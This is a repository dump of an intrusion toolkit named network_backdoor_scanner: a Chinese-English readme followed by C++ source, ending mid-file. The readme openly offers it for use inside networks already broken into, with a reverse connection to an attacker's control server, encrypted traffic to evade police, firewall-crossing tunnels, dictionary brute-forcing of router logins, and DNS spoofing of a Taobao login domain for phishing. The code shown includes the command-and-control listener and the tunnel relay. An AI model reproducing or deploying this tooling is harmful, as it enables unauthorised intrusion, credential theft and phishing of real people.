├── exe ├── reverse_server.exe └── scanner_framework.exe ├── readme.md ├── reverse_server ├── main.cpp ├── network_encoder.cpp ├── network_encoder.h ├── network_tunnal.cpp ├── network_tunnal.h ├── reverse_server.dsp ├── reverse_server.dsw ├── reverse_server.ncb ├── reverse_server.opt ├── reverse_server.plg ├── scan_tcp.cpp └── scan_tcp.h └── scanner_framework ├── Release ├── encoder_base64.obj ├── local_information.obj ├── local_network.obj ├── main.obj ├── network_crack.obj ├── network_encoder.obj ├── network_route.obj ├── network_server_dns.obj ├── resolver_dictionary.obj ├── resolver_express.obj ├── resolver_html.obj ├── resolver_http.obj ├── resolver_string.obj ├── scan_arp.obj ├── scan_icmp.obj ├── scan_tcp.obj ├── scanner_framework.exe ├── scanner_framework.pch └── vc60.idb ├── encoder_base64.cpp ├── encoder_base64.h ├── local_information.cpp ├── local_information.h ├── local_network.cpp ├── local_network.h ├── local_thread.cpp ├── local_thread.h ├── main.cpp ├── network_crack.cpp ├── network_crack.h ├── network_dictionary.h ├── network_encoder.cpp ├── network_encoder.h ├── network_route.cpp ├── network_route.h ├── network_server_dns.cpp ├── network_server_dns.h ├── resolver_dictionary.cpp ├── resolver_dictionary.h ├── resolver_express.cpp ├── resolver_express.h ├── resolver_html.cpp ├── resolver_html.h ├── resolver_http.cpp ├── resolver_http.h ├── resolver_string.cpp ├── resolver_string.h ├── route_design.png ├── scan_arp.cpp ├── scan_arp.h ├── scan_icmp.cpp ├── scan_icmp.h ├── scan_tcp.cpp ├── scan_tcp.h ├── scan_tcp_header.h ├── scanner_framework.dsp ├── scanner_framework.dsw ├── scanner_framework.ncb ├── scanner_framework.opt └── scanner_framework.plg /exe/reverse_server.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/network_backdoor_scanner/6d590e59ef48c6bebc127f0f92192a7584a63e04/exe/reverse_server.exe -------------------------------------------------------------------------------- /exe/scanner_framework.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/network_backdoor_scanner/6d590e59ef48c6bebc127f0f92192a7584a63e04/exe/scanner_framework.exe -------------------------------------------------------------------------------- /readme.md: -------------------------------------------------------------------------------- 1 |  2 | ## scanner_framework ## 3 | 4 | 5 | 中文: 6 | 网络探测框架,适用于入侵到内网探测其它网络设备,探测器具有体积小,功能多,而且带有反向连接从内网穿透出外网连接控制终端,通信数据采用动态加密,再也不怕警察叔叔知道我在干坏事儿啦,为了方便破解一些弱口令设备,内部带有在线破解功能(暂时支持HTTP 破解).如果觉得这些功能满足不了需求,可以使用端口映射把你需要的工具直接通过隧道对接到内网的某台指定的主机端口上进行扫描.. -- LCatro
7 | 8 | English: 9 | This is an internal network scanner like meterpreter .I will create more function into it scanner (now include many basic network scanner and network crack [like BurpSuite,crack HTTP]).Reverse connect function is to facilitate the attacker management hacked machine and crypte communication.Tunnel connect help your attack process's network flow crossing the firewall of internal network.
10 | 11 | 12 | *** 13 | 14 | ###启动方式 [How to launch it ] 15 | __scanner.exe__ 控制台启动 [Launch it by console]
16 | __scanner.exe -bind [%port%]__ 绑定端口,远程访问 [Bind a local port for waitting you to connect it]
17 | __scanner.exe -recon %ip% [%port%]__ 反向连接,远程访问,默认是80,注意记得先启动reverse_server ,不然scanner.exe 不能成功连接 [Reverse connect to specify ip,WARNING!Remenber launch reverse_server first and then using this parameter launch scanner.exe]
18 | 19 | ###使用方法 [How to use it ] 20 | 扫描当前网段存活的主机,并且自动搜集数据 [using ARP request to query live machine in current network]
21 | __using:arp__
22 | 获取当前主机的网络信息 [get this machine's information]
23 | __using:local__
24 | 测试主机是否连通 [ping ..you most know it ..]
25 | __using:ping %ip/host%__
26 | TCP SYN 扫描主机 [tcp syn scan,set -P scanner will testing port,set -F is fake a ip for hide itsalf in attack flow]
27 | __using:scan %ip% [-P:[port1,port2,port3,...]] [-F:[fake_ip1,fake_ip2,...]]__
28 | 洪水攻击主机 [dont use it ,because you will expose,so i never develop this function]
29 | __using:flood %ip% [-P:[port1,...]] [-F:[fake_ip1,...]]__
30 | 在线破解 [online crack]
31 | __using:crack %ip% %port% [%user_dictionary_path% %password_dictionary_path%]__
32 | 路由跟踪 [tracert route]
33 | __using:tracert %ip/host%__
34 | 抓取页面 [get a HTML page on server]
35 | __using:getpage %ip% [-PORT:%port%] [-PATH:%path%]__
36 | 启动端口转发功能 [tunnal port]
37 | __using:route -R:[%remote_ip%,%remote_port%] -L:[[%local_ip%,]%local_port%]__
38 | 启动DNS 服务器 [dns server]
39 | __using:dns [run|start] | add %host% %ip% | delete %ip%__
40 | 获取外网IP 地址和粗略定位 [get internet ip no is internal network ip and get the location]
41 | __using:ip__
42 | 显示帮助 [show help]
43 | __using:help__
44 | 退出 [exit scanner]
45 | __using:quit__
46 | 47 | 48 | *** 49 | 50 | ###在线破解 [About Online Crack] 51 | >在线破解功能原理是通过自己构造特定的HTTP 数据包然后程序根据字典穷举测试出帐号密码 52 | > 53 | >什么是表达式? 54 | > 55 | >表达式的意思是给程序一个填充数据的框架,在接下来的穷举测试中会根据表达式内的关键字来填充数据,下面是在线破解的例子: 56 | > 57 | >本地网络192.168.1.103:80 启用了PHP 服务器,在探测器里面输入破解命令 58 | > 59 | >crack 192.168.1.103 80 60 | > 61 | >然后会提示输入表达式 62 | > 63 | >input your crack express: 64 | > 65 | >输入数据包数据: 66 | >POST http://192.168.1.103:80/api/analays.php HTTP/1.1
67 | >Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
68 | >Referer: http://192.168.1.103/api/analays.php
69 | >Accept-Language: zh-CN
70 | >User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
71 | >Content-Type: application/x-www-form-urlencoded
72 | >Accept-Encoding: gzip, deflate
73 | >Host: 192.168.1.103
74 | >Content-length: %length%
75 | >Pragma: no-cache
76 | >
77 | >__user=%username%&pass=%password%__
78 | > 79 | >其中Content-length: %length% 的意思是让程序自动在此填充上下文的大小[因为这个长度是会变化的],%username% 和%password% 就是自动填充用户名和密码
[这里也可以不需要全部都用,比如破解水星路由器,直接填%password% 即可启动]
最后输入来确认数据包填写完成,如果中间某个位置出现填写错误就输入来重新填写破解数据包,下面的输入成功判断条件也是同理.. 80 | > 81 | >input your check term: 82 | > 83 | >输入成功判断条件,由于经过测试,如果输入密码成功的话,页面会返回一个包含Success 的字符串,然后把他作为破解成功的测试条件..
84 | >Success 85 | > 86 | >now cracking! 87 | > 88 | >__network crack - target:192.168.1.103:80
89 | >username:root password:toor__ 90 | > 91 | >破解完成 92 | > 93 | > 94 | >表达式函数: 95 | > 96 | >__base64(%string%)__ -- 采用base64 编码
97 | >__time()__ -- 获取系统时间
98 | >__len(%string%)__ -- 统计字符串长度
99 | >__rnd([%low%-%up%])__ -- 在%low% 到%up% 之间生成随机数
100 | > 101 | >Example : 102 | > 103 | >破解水星的数据包 (其它都差不多,关键在Cookie): 104 | > 105 | >Cookie: a2404_pages=10; a2404_times=5; __Authorization=Basic%20base64(admin:%password%)__ 106 | > 107 | >接下来会把%password% 先填充好之后再编码base64 108 | > 109 | >WARNING! 由于水平问题还做不出递归,请见谅 .. 110 | > 111 | 112 | 113 | *** 114 | 115 | ####DNS 服务器 [About DNS Server] 116 | 117 | DNS 服务器是针对内网的信息钓鱼,比如通过伪造的站点来钓得更多的个人信息或者欺骗应用程序更新,如果上面的用法还不太明白的话可以看这里 [DNS server usualy use redirecting to phishing sites]
118 | 119 | dns run 启动DNS 服务器 [run dns server]
120 | dns exit 退出DNS 服务器 [exit dns server]
121 | dns add m.login.taobao.com 127.0.0.1 把淘宝的手机登陆域名绑定到本地IP [point m.login.taobao.com to localhost via dns setting]
122 | dns delete www.baidu.com 删除DNS 查询项目 [delete this record]
123 | 124 |
125 | 126 | ####端口转发原理 [tunnal port design] 127 | ####![image](https://raw.githubusercontent.com/lcatro/network_backdoor/master/scanner_framework/route_design.png) 128 | 129 | 130 | *** 131 | 132 | ###Other 133 | 134 | #####reverse_server 是用来做反向连接用的服务端 135 | 136 | #####scanner.exe -bind 参数启动程序需要自己主动连过去,但是客户端还没写,也没什么需求,以后慢慢来.. -------------------------------------------------------------------------------- /reverse_server/main.cpp: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #include 8 | 9 | #include 10 | #include 11 | 12 | #include "network_encoder.h" 13 | #include "network_tunnal.h" 14 | 15 | #pragma comment (lib,"ws2_32") 16 | 17 | using std::string; 18 | 19 | #define PACKET_SEND_BUFFER 1024 20 | #define PAGE_BUFFER_LENGTH 1024*10 21 | 22 | #define DEFAULT_PORT 80 23 | 24 | 25 | string number_to_string(long in_number) { 26 | string result; 27 | char link_string[16]={0}; 28 | sprintf(link_string,"%ld",in_number); 29 | result=link_string; 30 | return result; 31 | } 32 | 33 | long string_to_number(const char* input_string) { 34 | long return_number=0; 35 | try { 36 | for (int number_index=strlen(input_string)-1;number_index>=0;--number_index,++input_string) { 37 | if (48<=*input_string && *input_string<=57) 38 | return_number+=(*input_string-48)*pow(10,number_index); 39 | else 40 | return -1; 41 | } 42 | } catch (...) { 43 | return -1; 44 | } 45 | return return_number; 46 | } 47 | 48 | const string quit("quit"); 49 | const string crack("crack"); 50 | const string end(""); 51 | bool connect_stat=false; 52 | 53 | static void recv_thread(unsigned int sock_accept) { 54 | while (1) { 55 | char result[PAGE_BUFFER_LENGTH]={0}; 56 | int recv_length=recv(sock_accept,result,PAGE_BUFFER_LENGTH,0); 57 | if (SOCKET_ERROR!=recv_length) { 58 | network_decode(result,recv_length); 59 | printf("%s\n",result); 60 | } else { 61 | printf("WARNING! lost connect ..\n"); 62 | break; 63 | } 64 | } 65 | connect_stat=false; 66 | } 67 | 68 | void main(void) { 69 | int bind_port=DEFAULT_PORT; 70 | char set_bind='N'; 71 | printf("use default port (Y/N)?:"); 72 | scanf("%c",&set_bind); 73 | 74 | if ('N'==set_bind || 'n'==set_bind) { 75 | printf("set local bind port:"); 76 | scanf("%d",&bind_port); 77 | gets(&set_bind); 78 | } 79 | 80 | WSADATA init; 81 | WSAStartup(1,&init); 82 | 83 | SOCKET sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); 84 | 85 | if (SOCKET_ERROR!=sock) { 86 | sockaddr_in local={0}; 87 | local.sin_family=AF_INET; 88 | local.sin_port=htons(bind_port); 89 | 90 | if (SOCKET_ERROR!=bind(sock,(const sockaddr*)&local,sizeof(local))) { 91 | listen(sock,1); 92 | 93 | printf("listening!\n"); 94 | SOCKET sock_accept=accept(sock,NULL,NULL); 95 | 96 | if (SOCKET_ERROR!=sock_accept) { 97 | connect_stat=true; 98 | printf("reverse connect OK!:\n"); 99 | CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)recv_thread,(void*)sock_accept,NULL,NULL); 100 | while (connect_stat) { 101 | printf(">"); 102 | char command[PACKET_SEND_BUFFER]={0}; 103 | gets(command); 104 | string resolve(command); 105 | unsigned int command_length=strlen(command); 106 | command_length=network_encode(command,command_length); 107 | 108 | send(sock_accept,command,command_length,0); 109 | 110 | if (-1!=resolve.find("route")) { 111 | string port(resolve.substr(resolve.find_last_of("-L:[")+1,resolve.length())); 112 | port=port.substr(0,port.find("]")); 113 | if (-1!=port.find(",")) 114 | port=port.substr(port.find(",")+1,port.length()); 115 | unsigned int local_port=string_to_number(port.c_str()); 116 | 117 | network_tunnal_open(local_port); 118 | } 119 | if (crack==resolve) { 120 | unsigned int end_count=0; 121 | while (1) { 122 | char line[PACKET_SEND_BUFFER]={0}; 123 | gets(line); 124 | string line_express(line); 125 | unsigned int line_length=strlen(line); 126 | line_length=network_encode(line,line_length); 127 | send(sock_accept,line,line_length,0); 128 | if (end==line_express) 129 | ++end_count; 130 | if (end_count>=2) 131 | break; 132 | } 133 | } else if (quit==resolve) { 134 | printf("Exit Server!\n"); 135 | break; 136 | } 137 | } 138 | closesocket(sock_accept); 139 | } 140 | } 141 | } 142 | closesocket(sock); 143 | } 144 | -------------------------------------------------------------------------------- /reverse_server/network_encoder.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/network_backdoor_scanner/6d590e59ef48c6bebc127f0f92192a7584a63e04/reverse_server/network_encoder.cpp -------------------------------------------------------------------------------- /reverse_server/network_encoder.h: -------------------------------------------------------------------------------- 1 | 2 | #ifndef _NETWORK_ENCODER_H__ 3 | #define _NETWORK_ENCODER_H__ 4 | 5 | unsigned int network_encode(char* encode_string,unsigned int encode_string_length_) ; 6 | void network_decode(char* decode_string,unsigned int decode_string_length); 7 | 8 | #endif 9 | -------------------------------------------------------------------------------- /reverse_server/network_tunnal.cpp: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #include 4 | 5 | #include 6 | 7 | #include 8 | 9 | #include "network_encoder.h" 10 | #include "scan_tcp.h" 11 | 12 | using std::pair; 13 | 14 | typedef pair pair_handle; 15 | 16 | #define PACKET_RECV_BUFFER 1024 17 | 18 | static long string_to_number(const char* input_string) { 19 | long return_number=0; 20 | try { 21 | for (int number_index=strlen(input_string)-1;number_index>=0;--number_index,++input_string) { 22 | if (48<=*input_string && *input_string<=57) 23 | return_number+=(*input_string-48)*pow(10,number_index); 24 | else 25 | return -1; 26 | } 27 | } catch (...) { 28 | return -1; 29 | } 30 | return return_number; 31 | } 32 | 33 | void network_tunnal_init(void) { 34 | WSADATA init; 35 | WSAStartup(1,&init); 36 | } 37 | 38 | void network_tunnal_close(void) { 39 | WSACleanup(); 40 | } 41 | 42 | static void network_route_thread_tunnal(pair_handle* pair_socket) { 43 | char recv_buffer[PACKET_RECV_BUFFER]={0}; 44 | 45 | while (true) { 46 | unsigned int recv_length=scan_tcp_recv(pair_socket->first,recv_buffer,PACKET_RECV_BUFFER); 47 | 48 | if (-1==recv_length || !recv_length) 49 | break; 50 | 51 | network_decode(recv_buffer,recv_length); 52 | scan_tcp_send(pair_socket->second,recv_buffer,recv_length); 53 | memset(recv_buffer,0,recv_length); 54 | } 55 | 56 | delete pair_socket; 57 | } 58 | 59 | static void network_route_thread_local(pair_handle* pair_socket) { 60 | char recv_buffer[PACKET_RECV_BUFFER]={0}; 61 | 62 | while (true) { 63 | unsigned int recv_length=scan_tcp_recv(pair_socket->first,recv_buffer,PACKET_RECV_BUFFER); 64 | 65 | if (-1==recv_length || !recv_length) 66 | break; 67 | 68 | recv_length=network_encode(recv_buffer,recv_length); 69 | scan_tcp_send(pair_socket->second,recv_buffer,recv_length); 70 | memset(recv_buffer,0,recv_length); 71 | } 72 | 73 | delete pair_socket; 74 | } 75 | 76 | static void network_route_thread_main(unsigned int local_port) { 77 | unsigned int local_listen=scan_tcp_bind(local_port); 78 | 79 | if (-1!=local_listen) { 80 | unsigned int reverse_connect=scan_tcp_accept(local_listen); 81 | unsigned int local_connect =scan_tcp_accept(local_listen); 82 | 83 | if (-1!=reverse_connect && -1!=local_listen) { 84 | HANDLE thread_listen=INVALID_HANDLE_VALUE,thread_connect=INVALID_HANDLE_VALUE; 85 | 86 | thread_listen=CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)&network_route_thread_local,new pair_handle(local_connect,reverse_connect),NULL,NULL); 87 | thread_connect=CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)&network_route_thread_tunnal,new pair_handle(reverse_connect,local_connect),NULL,NULL); 88 | 89 | if (INVALID_HANDLE_VALUE!=thread_listen && INVALID_HANDLE_VALUE!=thread_connect) { 90 | WaitForSingleObject(thread_listen,INFINITE); 91 | WaitForSingleObject(thread_connect,INFINITE); 92 | return; 93 | } 94 | } 95 | } 96 | } 97 | 98 | bool network_tunnal_open(unsigned int local_port) { 99 | HANDLE thread=CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)&network_route_thread_main,(void*)local_port,NULL,NULL); 100 | 101 | if (INVALID_HANDLE_VALUE!=thread) 102 | return true; 103 | return false; 104 | } 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | -------------------------------------------------------------------------------- /reverse_server/network_tunnal.h: -------------------------------------------------------------------------------- 1 | 2 | #ifndef _NETWORK_TUNNAL_H__ 3 | #define _NETWORK_TUNNAL_H__ 4 | 5 | void network_tunnal_init(void); 6 | void network_tunnal_close(void); 7 | bool network_tunnal_open(unsigned int local_port); 8 | 9 | #endif 10 | -------------------------------------------------------------------------------- /reverse_server/reverse_server.dsp: -------------------------------------------------------------------------------- 1 | # Microsoft Developer Studio Project File - Name="reverse_server" - Package Owner=<4> 2 | # Microsoft Developer Studio Generated Build File, Format Version 6.00 3 | # ** DO NOT EDIT ** 4 | 5 | # TARGTYPE "Win32 (x86) Console Application" 0x0103 6 | 7 | CFG=reverse_server - Win32 Debug 8 | !MESSAGE This is not a valid makefile. To build this project using NMAKE, 9 | !MESSAGE use the Export Makefile command and run 10 | !MESSAGE 11 | !MESSAGE NMAKE /f "reverse_server.mak". 12 | !MESSAGE 13 | !MESSAGE You can specify a configuration when running NMAKE 14 | !MESSAGE by defining the macro CFG on the command line. For example: 15 | !MESSAGE 16 | !MESSAGE NMAKE /f "reverse_server.mak" CFG="reverse_server - Win32 Debug" 17 | !MESSAGE 18 | !MESSAGE Possible choices for configuration are: 19 | !MESSAGE 20 | !MESSAGE "reverse_server - Win32 Release" (based on "Win32 (x86) Console Application") 21 | !MESSAGE "reverse_server - Win32 Debug" (based on "Win32 (x86) Console Application") 22 | !MESSAGE 23 | 24 | # Begin Project 25 | # PROP AllowPerConfigDependencies 0 26 | # PROP Scc_ProjName "" 27 | # PROP Scc_LocalPath "" 28 | CPP=cl.exe 29 | RSC=rc.exe 30 | 31 | !IF "$(CFG)" == "reverse_server - Win32 Release" 32 | 33 | # PROP BASE Use_MFC 0 34 | # PROP BASE Use_Debug_Libraries 0 35 | # PROP BASE Output_Dir "Release" 36 | # PROP BASE Intermediate_Dir "Release" 37 | # PROP BASE Target_Dir "" 38 | # PROP Use_MFC 0 39 | # PROP Use_Debug_Libraries 0 40 | # PROP Output_Dir "Release" 41 | # PROP Intermediate_Dir "Release" 42 | # PROP Ignore_Export_Lib 0 43 | # PROP Target_Dir "" 44 | # ADD BASE CPP /nologo /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /c 45 | # ADD CPP /nologo /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /c 46 | # ADD BASE RSC /l 0x804 /d "NDEBUG" 47 | # ADD RSC /l 0x804 /d "NDEBUG" 48 | BSC32=bscmake.exe 49 | # ADD BASE BSC32 /nologo 50 | # ADD BSC32 /nologo 51 | LINK32=link.exe 52 | # ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /machine:I386 53 | # ADD LINK32 kernel32.lib user32.lib /nologo /subsystem:console /machine:I386 54 | # SUBTRACT LINK32 /nodefaultlib 55 | 56 | !ELSEIF "$(CFG)" == "reverse_server - Win32 Debug" 57 | 58 | # PROP BASE Use_MFC 0 59 | # PROP BASE Use_Debug_Libraries 1 60 | # PROP BASE Output_Dir "Debug" 61 | # PROP BASE Intermediate_Dir "Debug" 62 | # PROP BASE Target_Dir "" 63 | # PROP Use_MFC 0 64 | # PROP Use_Debug_Libraries 1 65 | # PROP Output_Dir "Debug" 66 | # PROP Intermediate_Dir "Debug" 67 | # PROP Target_Dir "" 68 | # ADD BASE CPP /nologo /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /GZ /c 69 | # ADD CPP /nologo /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /GZ /c 70 | # ADD BASE RSC /l 0x804 /d "_DEBUG" 71 | # ADD RSC /l 0x804 /d "_DEBUG" 72 | BSC32=bscmake.exe 73 | # ADD BASE BSC32 /nologo 74 | # ADD BSC32 /nologo 75 | LINK32=link.exe 76 | # ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /debug /machine:I386 /pdbtype:sept 77 | # ADD LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /debug /machine:I386 /pdbtype:sept 78 | 79 | !ENDIF 80 | 81 | # Begin Target 82 | 83 | # Name "reverse_server - Win32 Release" 84 | # Name "reverse_server - Win32 Debug" 85 | # Begin Group "Source Files" 86 | 87 | # PROP Default_Filter "cpp;c;cxx;rc;def;r;odl;idl;hpj;bat" 88 | # Begin Source File 89 | 90 | SOURCE=.\main.cpp 91 | # End Source File 92 | # Begin Source File 93 | 94 | SOURCE=.\network_encoder.cpp 95 | # End Source File 96 | # Begin Source File 97 | 98 | SOURCE=.\network_tunnal.cpp 99 | # End Source File 100 | # Begin Source File 101 | 102 | SOURCE=.\scan_tcp.cpp 103 | # End Source File 104 | # End Group 105 | # Begin Group "Header Files" 106 | 107 | # PROP Default_Filter "h;hpp;hxx;hm;inl" 108 | # Begin Source File 109 | 110 | SOURCE=.\network_encoder.h 111 | # End Source File 112 | # Begin Source File 113 | 114 | SOURCE=.\network_tunnal.h 115 | # End Source File 116 | # Begin Source File 117 | 118 | SOURCE=.\scan_tcp.h 119 | # End Source File 120 | # End Group 121 | # Begin Group "Resource Files" 122 | 123 | # PROP Default_Filter "ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe" 124 | # End Group 125 | # End Target 126 | # End Project 127 | -------------------------------------------------------------------------------- /reverse_server/reverse_server.dsw: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/network_backdoor_scanner/6d590e59ef48c6bebc127f0f92192a7584a63e04/reverse_server/reverse_server.dsw -------------------------------------------------------------------------------- /reverse_server/reverse_server.ncb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/network_backdoor_scanner/6d590e59ef48c6bebc127f0f92192a7584a63e04/reverse_server/reverse_server.ncb -------------------------------------------------------------------------------- /reverse_server/reverse_server.opt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/network_backdoor_scanner/6d590e59ef48c6bebc127f0f92192a7584a63e04/reverse_server/reverse_server.opt -------------------------------------------------------------------------------- /reverse_server/reverse_server.plg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 
 4 | 
Build Log

 5 | 

 6 | --------------------Configuration: reverse_server - Win32 Release--------------------
 7 | 

 8 | 
Command Lines

 9 | Creating temporary file "C:\Users\ADMINI~1\AppData\Local\Temp\RSPA648.tmp" with contents
10 | [
11 | /nologo /ML /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_CONSOLE" /D "_MBCS" /Fp"Release/reverse_server.pch" /YX /Fo"Release/" /Fd"Release/" /FD /c 
12 | "C:\Users\Administrator\Desktop\code_file\scaner\reverse_server\main.cpp"
13 | ]
14 | Creating command line "cl.exe @C:\Users\ADMINI~1\AppData\Local\Temp\RSPA648.tmp" 
15 | Creating temporary file "C:\Users\ADMINI~1\AppData\Local\Temp\RSPA649.tmp" with contents
16 | [
17 | kernel32.lib user32.lib /nologo /subsystem:console /incremental:no /pdb:"Release/reverse_server.pdb" /machine:I386 /out:"Release/reverse_server.exe" 
18 | .\Release\main.obj
19 | .\Release\network_encoder.obj
20 | .\Release\network_tunnal.obj
21 | .\Release\scan_tcp.obj
22 | ]
23 | Creating command line "link.exe @C:\Users\ADMINI~1\AppData\Local\Temp\RSPA649.tmp"
24 | 
Output Window

25 | Compiling...
26 | main.cpp
27 | Linking...
28 | 
29 | 
30 | 
31 | 
Results

32 | reverse_server.exe - 0 error(s), 0 warning(s)
33 |
34 | 35 | 36 | -------------------------------------------------------------------------------- /reverse_server/scan_tcp.cpp: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #include 4 | #include 5 | 6 | #include 7 | 8 | #include "scan_tcp.h" 9 | 10 | #pragma comment (lib,"ws2_32") 11 | 12 | unsigned int scan_tcp_connect(const char* target_ip,unsigned short target_port) { 13 | if (NULL==target_ip || !(0 3 | #include 4 | #include 5 | 6 | #include "encoder_base64.h" 7 | 8 | static const char base[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; 9 | char* base64_encode(const char* data, int data_len); 10 | char *base64_decode(const char* data, int data_len); 11 | static char find_pos(char ch); 12 | 13 | char *base64_encode(const char* data, int data_len) 14 | { 15 | //int data_len = strlen(data); 16 | int prepare = 0; 17 | int ret_len; 18 | int temp = 0; 19 | char *ret = NULL; 20 | char *f = NULL; 21 | int tmp = 0; 22 | char changed[4]; 23 | int i = 0; 24 | ret_len = data_len / 3; 25 | temp = data_len % 3; 26 | if (temp > 0) 27 | { 28 | ret_len += 1; 29 | } 30 | ret_len = ret_len*4 + 1; 31 | ret = (char *)malloc(ret_len); 32 | 33 | if ( ret == NULL) 34 | { 35 | return ret; 36 | } 37 | memset(ret, 0, ret_len); 38 | f = ret; 39 | while (tmp < data_len) 40 | { 41 | temp = 0; 42 | prepare = 0; 43 | memset(changed, '\0', 4); 44 | while (temp < 3) 45 | { 46 | //printf("tmp = %d\n", tmp); 47 | if (tmp >= data_len) 48 | { 49 | break; 50 | } 51 | prepare = ((prepare << 8) | (data[tmp] & 0xFF)); 52 | tmp++; 53 | temp++; 54 | } 55 | prepare = (prepare<<((3-temp)*8)); 56 | //printf("before for : temp = %d, prepare = %d\n", temp, prepare); 57 | for (i = 0; i < 4 ;i++ ) 58 | { 59 | if (temp < i) 60 | { 61 | changed[i] = 0x40; 62 | } 63 | else 64 | { 65 | changed[i] = (prepare>>((3-i)*6)) & 0x3F; 66 | } 67 | *f = base[changed[i]]; 68 | //printf("%.2X", changed[i]); 69 | f++; 70 | } 71 | } 72 | *f = '\0'; 73 | 74 | return ret; 75 | 76 | } 77 | /* */ 78 | static char find_pos(char ch) 79 | { 80 | char *ptr = (char*)strrchr(base, ch);//the last position (the only) in base[] 81 | return (ptr - base); 82 | } 83 | /* */ 84 | char *base64_decode(const char *data, int data_len) 85 | { 86 | int ret_len = (data_len / 4) * 3; 87 | int equal_count = 0; 88 | char *ret = NULL; 89 | char *f = NULL; 90 | int tmp = 0; 91 | int temp = 0; 92 | char need[3]; 93 | int prepare = 0; 94 | int i = 0; 95 | if (*(data + data_len - 1) == '=') 96 | { 97 | equal_count += 1; 98 | } 99 | if (*(data + data_len - 2) == '=') 100 | { 101 | equal_count += 1; 102 | } 103 | if (*(data + data_len - 3) == '=') 104 | {//seems impossible 105 | equal_count += 1; 106 | } 107 | switch (equal_count) 108 | { 109 | case 0: 110 | ret_len += 4;//3 + 1 [1 for NULL] 111 | break; 112 | case 1: 113 | ret_len += 4;//Ceil((6*3)/8)+1 114 | break; 115 | case 2: 116 | ret_len += 3;//Ceil((6*2)/8)+1 117 | break; 118 | case 3: 119 | ret_len += 2;//Ceil((6*1)/8)+1 120 | break; 121 | } 122 | ret = (char *)malloc(ret_len); 123 | if (ret == NULL) 124 | { 125 | return ret; 126 | } 127 | memset(ret, 0, ret_len); 128 | f = ret; 129 | while (tmp < (data_len - equal_count)) 130 | { 131 | temp = 0; 132 | prepare = 0; 133 | memset(need, 0, 4); 134 | while (temp < 4) 135 | { 136 | if (tmp >= (data_len - equal_count)) 137 | { 138 | break; 139 | } 140 | prepare = (prepare << 6) | (find_pos(data[tmp])); 141 | temp++; 142 | tmp++; 143 | } 144 | prepare = prepare << ((4-temp) * 6); 145 | for (i=0; i<3 ;i++ ) 146 | { 147 | if (i == temp) 148 | { 149 | break; 150 | } 151 | *f = (char)((prepare>>((2-i)*8)) & 0xFF); 152 | f++; 153 | } 154 | } 155 | *f = '\0'; 156 | return ret; 157 | } -------------------------------------------------------------------------------- /scanner_framework/encoder_base64.h: -------------------------------------------------------------------------------- 1 | 2 | #ifndef _ENCODER_BASE64_H__ 3 | #define _ENCODER_BASE64_H__ 4 | 5 | char* base64_encode(const char* data,int data_length); 6 | char* base64_decode(const char* data,int data_length); 7 | 8 | #endif 9 | -------------------------------------------------------------------------------- /scanner_framework/local_information.cpp: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | 4 | #include 5 | 6 | #include "local_information.h" 7 | 8 | #define VER_NT_WORKSTATION 1 9 | #define SM_SERVERR2 89 10 | 11 | typedef struct { 12 | DWORD dwOSVersionInfoSize; 13 | DWORD dwMajorVersion; 14 | DWORD dwMinorVersion; 15 | DWORD dwBuildNumber; 16 | DWORD dwPlatformId; 17 | TCHAR szCSDVersion[128]; 18 | WORD wServicePackMajor; 19 | WORD wServicePackMinor; 20 | WORD wSuiteMask; 21 | BYTE wProductType; 22 | BYTE wReserved; 23 | } OSVERSIONINFOEX_; 24 | 25 | bool 